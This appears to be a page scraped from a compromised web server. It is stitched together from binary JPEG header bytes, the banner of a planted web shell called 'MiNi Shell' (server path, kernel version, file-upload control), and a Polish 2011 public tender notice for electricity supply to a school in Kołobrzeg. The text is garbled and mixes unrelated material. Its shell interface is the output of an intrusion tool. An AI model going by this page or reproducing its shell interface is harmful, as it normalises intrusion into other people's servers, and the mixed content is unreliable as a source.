JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110526/129702-N-2011.html

<p class="kh_header"><b>Kołobrzeg: Dostawę i przesył energii elektrycznej do budynków 
Zespołu Szkół Ekonomiczno-Hotelarskich w Kołobrzegu</b><br>
<b>Numer ogłoszenia: 129702 - 2011; data zamieszczenia: 26.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ekonomiczno-Hotelarskich im. Emilii Gierczak , ul. Łopuskiego 13, 78-100 Kołobrzeg, woj. zachodniopomorskie, tel. 0-94 35 115 55, faks 0-94 35 115 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ekonom-kolobrzeg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę i przesył energii elektrycznej do budynków 
Zespołu Szkół Ekonomiczno-Hotelarskich w Kołobrzegu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III PRZEDMIOT ZAMÓWIENIA I TERMIN REALIZACJI.

1 . Przedmiotem zamówienia jest:

Dostawa i przesył energii elektrycznej do budynków Zespołu Ekonomiczno-Hotelarskich w Kołobrzegu przy ul. Łopuskiego 13 i Katedralnej 12.
Dostawa energii elektrycznej i świadczenie usług dystrybucji odbywać się będzie na
warunkach określonych w ustawie - Prawo energetyczne z dnia 10 kwietnia 1997 r. (Dz. U. Nr 89 z 2006 r., poz. 625 ze zm.), przepisach wykonawczych do tej ustawy, a w szczególności Rozporządzeniu Ministra Gospodarki z dnia 4 maja 2007 roku w sprawie szczegółowych warunków funkcjonowania systemu elektroenergetycznego (Dz. U. Nr 93, poz.623), Taryfie dla energii elektrycznej sprzedawcy, Taryfie dla usług dystrybucji energii elektrycznej właściwego Operatora Systemu Dystrybucyjnego (Taryfie OSD), Instrukcji Ruchu i Eksploatacji Sieci Dystrybucyjnej (IRiESD) oraz ogólnie obowiązujących przepisach prawnych.
Przedmiot zamówienia w okresie realizacji będzie obejmował:
a)dostawę i przesył energii elektrycznej do budynków Zespołu Szkół Ekonomiczno-Hotelarskich w Kołobrzegu przy ul. Łopuskiego 13 i Katedralnej 12.
zgodnie z obowiązującymi parametrami jakościowymi energii elektrycznej ustalonymi w ustawie Prawo Energetyczne z dnia 10 kwietnia 1997r. (Dz. U. z 2006 nr 89, poz. 625 z poźn. zm.), a w szczególności w Rozporządzeniu Ministra Gospodarki z dnia 4 maja 2007 roku w sprawie szczegółowych warunków funkcjonowania systemu elektroenergetycznego (Dz. U. Nr 93, poz.623),
b)ewentualną  instalację i wymianę na własny koszt układu pomiarowo-rozliczeniowego,
c) bezzwłoczną likwidację przerw w dostarczaniu energii elektrycznej,
d) informowanie Zamawiającego o planowanych przerwach w dostawie energii elektrycznej.

Dane dotyczące układu zasilania w energię elektryczną dla budynków Zespołu Szkół Ekonomiczno-Hotelarskich w Kołobrzegu przy ul. Łopuskiego 13 i Katedralna 12
Tabela 1
obiekt	Kołobrzeg ul. Łopuskiego 13 budynek szkolny
Rodzaj przyłącza	Linia kablowa  0,4 kV
Miejsce przyłączenia do sieci/g-a własności	Złącze kablowe- końcówki kabla zasilającego w złączu kablowym
Moc przyłączeniowa 	98 kW

Moc umowna (kW)	styczeń         60   
 luty              55
marzec          55    
kwiecień       60
maj                55     
czerwiec       50	lipiec             45  
sierpień         45 
wrzesień       50    
październik   55
listopad         60    
grudzień        60
Przewidywane roczne zużycie energii 30mies.	266 000 kWh
Grupa taryfowa	C21
Napięcie zasilania	400 V

Grupa przyłączeniowa	IV
Układ pomiarowy	Układ pomiarowo-rozliczeniowy 3 fazowy półpośredni współczynnik mocy tg ^0=0,4


Tabela 2


obiekt	Kołobrzeg ul. Katedralna 12 stara część
Rodzaj przyłącza	Linia kablowa  0,4 kV
Miejsce przyłączenia do sieci/g-a własności	Złącze kablowe- końcówki kabla zasilającego w złączu kablowym
Moc przyłączeniowa 	98 kW

Moc umowna 	styczeń         60   
 luty              55
marzec          55    
kwiecień       50
maj                50     
czerwiec       50	lipiec             30  
sierpień         30 
wrzesień       55   
październik   60
listopad         60    
grudzień        60
Przewidywane roczne zużycie energii 30 mies.	238 000 kWh
Grupa taryfowa	C21
Napięcie zasilania	400 V

Grupa przyłączeniowa	IV
Układ pomiarowy	Układ pomiarowo-rozliczeniowy 3 fazowy  bezpośredni współczynnik mocy tg ^0=0,4


Tabela 3

obiekt	Kołobrzeg ul. Katedralna 12 nowa część
Rodzaj przyłącza	Linia kablowa  0,4 kV
Miejsce przyłączenia do sieci/g-a własności	Złącze kablowe- końcówki kabla zasilającego w złączu kablowym
Moc przyłączeniowa 	98 kW
Moc umowna 	od stycznia do grudnia 40 kW
Przewidywane roczne zużycie energii 30 mies.	246 000 kWh
Grupa taryfowa	C21
Napięcie zasilania	400 V


Grupa przyłączeniowa	IV
Układ pomiarowy	Układ pomiarowo-rozliczeniowy 3 fazowy  bezpośredni współczynnik mocy tg ^0=0,4
 
     Razem: 750.000 KWh

Wykonawca zobowiązuje się do zapewnienia w szczególności następujących podstawowych standardów jakościowych obsługi Zamawiającego oraz parametrów technicznych energii elektrycznej;
a) napięcia znamionowego sieci 15 kV, o częstotliwości 50 Hz z dopuszczalnymi odchyleniami, określonymi w ustawie Prawo Energetyczne wraz z rozporządzeniami wykonawczymi,
b) przyjmowania przez całą dobę zgłoszeń i reklamacji od Zamawiającego,
c) niezwłocznego likwidowania przerw i zakłóceń w dostarczaniu energii elektrycznej,
d) udzielania Zamawiającemu, na jego żądanie informacji o terminie wznowienia dostarczania energii elektrycznej, przerwanego z powodu awarii sieci,
e) nieodpłatnego udzielania informacji w sprawie zasad rozliczeń oraz taryfy.
5. W pozostałym zakresie Wykonawca zobowiązuje się do przestrzegania standardów jakościowych obsługi Zamawiającego oraz parametrów technicznych energii elektrycznej określonych w ustawie Prawo Energetyczne wraz z rozporządzeniami wykonawczymi oraz innych powszechnie obowiązujących przepisów prawa w tym zakresie.
6. Rozliczenia za energię elektryczną, usługi przesyłowe i dystrybucyjne odbywać się będą w okresach miesięcznych na podstawie odczytów wskazań liczników, cen stawek wszystkich opłat związanych z realizacją przedmiotu zamówienia.
7. W przypadku konieczności wymiany lub demontażu elementów układu pomiarowo - rozliczeniowego, dokonanego na wniosek Zamawiającego lub Wykonawcy, dowodem przeprowadzenia czynności jest zlecenie OTS potwierdzone podpisami przedstawicieli Zamawiającego i Wykonawcy.

Rozliczenia między stronami odbywać się będą wg cen i stawek opłat z aktualnie
obowiązującej taryfy. O zmianach cen i opłat Wykonawca będzie informował w sposób
ustalony przepisami.
Należności za usługę przesyłową i pobraną energię płatna będzie w terminie 14 dni licząc od daty otrzymania faktury VAT przez Zamawiającego.
Dotychczasowym dostawcą energii elektrycznej oraz usługi przesyłu jest ENERGA  w przypadku wyboru innego Wykonawcy, to na nim spoczywał będzie
obowiązek spełnienia wszelkich wymaganych formalności i uzgodnień z dotychczasowym dostawcą energii, by zachować płynność w dostawie energii i nie powodować przerww dopływie prądu.

2. Termin realizacji zamówienia:

Termin wykonania zamówienia ustala się od dnia: 01.07.2011 do dnia 31.12.2013r.

3. Oznaczenie przedmiotu zamówienia wg Wspólnego Słownika Zamówień (CPV):

09300000-2 - Energia elektryczna, cieplna, słoneczna i jądrowa
65310000-9 - Przesył energii elektrycznej

4. Tryb udzielenia zamówienia publicznego: Przetarg nieograniczony na podstawie art. 39 ustawy z dnia 29.01.2004r. - Prawo zamówień publicznych (Dz. U. z 2007r. Nr 223 poz.1655 z poźn. zm.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 09.30.00.00-2, 65.31.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium. Wadium w wysokości 4000,- zł należy
wnieść przed upływem terminu składania ofert czyli do dnia 15.06.2011r. do godz. 9:00.
Wadium może być wniesione w pieniądzu; w poręczeniach bankowych lub poręczeniach
spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. (Dz. U. Nr 109,poz. 1158, z późn. zm.).
Z treści gwarancji winno wynikać bezwarunkowo, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych art. 46 ust. 5 ustawy Prawo zamówień publicznych tj. w przypadku gdy Wykonawca:
-odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
Wadium wnoszone w pieniądzu należy wpłacać przelewem na konto Zamawiającego: 
Konto Bank Gospodarki Żywnościowej SA o/ Kołobrzeg:
lub w kasie szkoły (SKONSULTOWAĆ Z KSIĘGOWOŚCIĄ MOŻLIWOŚĆ ZAPŁATY WADIUM W GOTÓWCE W KASIE SZKOŁY)
 lub innej formie zabezpieczenia zgodnego z Ustawą z dnia 29 stycznia 2004 r. prawo zamówień publicznych (Dz. U. z 2006 r. Nr 164, poz. 1163 z póź. zm.) Art. 45 p. 6.
Wszystkie formy wadium powinny mieć określoną ważność zgodną z okresem związania
ofertą. Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania
ofert.
Zwrot wadium nastąpi niezwłocznie, jeżeli zaistnieje jedna z poniższych okoliczności:
- upłynął termin związania ofertą,
-zamawiający unieważnił postępowanie, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
Z zastrzeżeniem art. 46 ust. 4a ustawy PZP, Zamawiający zwróci wadium niezwłocznie, na pisemny wniosek Wykonawcy, który:
- wycofał ofertę przed upływem terminu składania ofert,
- został wykluczony z postępowania,
- którego oferta została odrzucona.
Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca na rachunek bankowy wskazany przez Wykonawcę. Zamawiający zatrzymuje wadium, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych
w ofercie,
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy,
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złoży dokumentów lub oświadczeń, o których  
mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
6. Dokumenty powinny być przedstawione w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę.
7. Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wyłącznie wtedy, gdy przedstawiona przez Wykonawcę kserokopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości, a Zamawiający nie może sprawdzić jej prawdziwości w inny sposób.
7. Zmiany naniesione przez Wykonawcę po sporządzeniu oferty winny być zaparafowane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>SPOSÓB DOKONYWANIA OCENY SPEŁNIANIA WARUNKÓW OPISANYCH
W CZĘŚCI III SIWZ.
 ODESŁANIA DO JEDNOSTEK REDAKCYJNYCH, KTÓRE NIE ISTNIEJĄ LUB MÓWIĄ O CZYMŚ INNYM
Ocena spełniania warunków, o których mowa w części III SIWZ zostanie dokonana w następujący sposób:
1. Zamawiający przyjmie, na podstawie złożonego oświadczenia przez Wykonawcę
i dokumentów potwierdzających, że wykonawca spełnia warunki udziału w postępowaniu,
a mianowicie:
- oświadczenie zgodne z treścią załącznika nr 2 do SIWZ,
- art. 22 ust. 1 pkt. 1 - ocena spełnienia warunku będzie dokonana na podstawie dokumentu,
o którym mowa w części III B pkt. 6, 
2. Warunki określone w części III pkt. 3 i 4 wykonawca potwierdzi odpowiednio
w formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ. 
3. Warunek określony w części III pkt. 6, Wykonawca potwierdzi poprzez złożenie
dokumentu o którym mowa w części VI B pkt. 7.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają uprawnienia do wykonywania działalności gospodarczej i koncesję na prowadzenie działalności w zakresie obrotu energią elektryczną wydaną przez Prezesa Urzędu Regulacji Energetyki,
) posiadają aktualną umowę z Operatorem Systemu Dystrybucyjnego (OSD) na świadczenie usług dystrybucyjnych na obszarze, na którym znajduje się miejsce dostarczania energii elektrycznej wskazanego obiektu Zamawiającego,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają uprawnienia do wykonywania działalności gospodarczej i koncesję na prowadzenie działalności w zakresie obrotu energią elektryczną wydaną przez Prezesa Urzędu Regulacji Energetyki,
) posiadają aktualną umowę z Operatorem Systemu Dystrybucyjnego (OSD) na świadczenie usług dystrybucyjnych na obszarze, na którym znajduje się miejsce dostarczania energii elektrycznej wskazanego obiektu Zamawiającego,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>IV. WARUNKI UCZESTNICTWA W POSTĘPOWANIU O UDZIELENIE
ZAMÓWIENIA.
W postępowaniu o udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają
następujące warunki:
1) nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 i spełniają warunki
określone w art. 22 ust.1 pkt. 1-3 PZP,
2) mają uprawnienia do występowania w obrocie prawnym,
3) wykonają zamówienie w terminie określonym w części I pkt. 2 SIWZ
4) zaakceptują termin płatności faktury 14 dni od dnia otrzymania faktury przez Zamawiającego.
5) posiadają uprawnienia do wykonywania działalności gospodarczej i koncesję na prowadzenie działalności w zakresie obrotu energią elektryczną wydaną przez Prezesa Urzędu Regulacji Energetyki,
6) posiadają aktualną umowę z Operatorem Systemu Dystrybucyjnego (OSD) na świadczenie
usług dystrybucyjnych na obszarze, na którym znajduje się miejsce dostarczania energii
elektrycznej wskazanego obiektu Zamawiającego,
7) wpłacą wadium.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>) mają uprawnienia do występowania w obrocie prawnym,
) wykonają zamówienie w terminie określonym w części I pkt. 2 SIWZ
) posiadają uprawnienia do wykonywania działalności gospodarczej i koncesję na prowadzenie działalności w zakresie obrotu energią elektryczną wydaną przez Prezesa Urzędu Regulacji Energetyki,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>B. OFERTA MUSI ZAWIERAĆ:
1. Wypełniony Formularz oferty wg załącznika nr 1.
2. Oświadczenie wykonawcy o spełnieniu warunków, o których mowa w art. 24 ust. 1 i 2 oraz art. 22 ust. 1 pkt. 1-3 PZP wg załącznika nr 2.
3. W przypadku, gdy składający ofertę są wspólnikami spółki cywilnej do oferty należy dołączyć kserokopię umowy spółki.
4. Upoważnienie do sporządzenia i podpisania oferty, jeżeli ofertę podpisuje osoba upoważniona przez osobę lub osoby uprawnione do reprezentowania firmy w sposób określony w akcie rejestrowym.
5. Wszelkie pełnomocnictwa udzielane w związku z występowaniem w prowadzonym postępowaniu o udzielenie zamówienia publicznego muszą być złożone z ofertą
i podpisane przez osoby mające prawo do reprezentacji wykonawcy.
- Dokument udzielonego pełnomocnictwa w formie oryginału albo kopii potwierdzonej
notarialnie, należy złożyć z ofertą.
6. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy
przed upływem terminu składania ofert. Dokumenty te mogą być przedstawione również w formie kserokopii poświadczonej za zgodność z oryginałem przez osobę/y uprawnioną/e do reprezentowania Wykonawcy.
7. Oświadczenie, że Wykonawca posiada zawartą umowę z Operatorem Systemu Dystrybucyjnego (OSD) na świadczenie usług dystrybucyjnych na obszarze, na którym znajduje się miejsce dostarczenia energii elektrycznej (dotyczy Wykonawców nie będących właścicielem sieci dystrybucyjnej).
8. Oświadczenie, iż sporządzona umowa będzie umową kompleksową obejmującą sprzedaż energii oraz świadczenie usługi przesyłania i dystrybucji energii elektrycznej.
9. Dowód wniesienia wadium.
10. Koncesję na prowadzenie działalności w zakresie obrotu energią elektryczną wydane przez Prezesa Urzędu Regulacji Energetyki.
11. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 1 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane, (Dz. U. z 2009 r. Nr 226 poz. 1817) wykonawca winien złożyć dokumenty, o których mowa w §4.1cyt. rozporządzenia.
12. Wykaz części zamówienia, której wykonania Wykonawca powierzy Podwykonawcom.
13. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:
- są zobowiązani ustanowić Pełnomocnika do reprezentowania ich w postępowaniu
o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (np. wspólnicy spółki cywilnej oraz członkowie konsorcjum),
- ponoszą solidarną odpowiedzialność za wykonanie umowy. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z przedsiębiorcą występującym jako pełnomocnik pozostałych (lider).
14. Każdy z podmiotów występujących wspólnie zobowiązany jest do złożenia oświadczeń i dokumentów określonych w rozdz. VIB.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ekonomo-kolobrzeg.pl i http://zsehkolobrzeg.finn.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ekonomiczno-Hotelarskich, ul.Łopuskiego 13, 78-100 Kołobrzeg pok.114, tel.943511556.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2011 godzina 10:00, miejsce: Zespół Szkół Ekonomiczno-Hotelarskich, ul.Łopuskiego 13, 78-100 Kołobrzeg pok.107, tel.943511556.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 15.07.2011.</p>





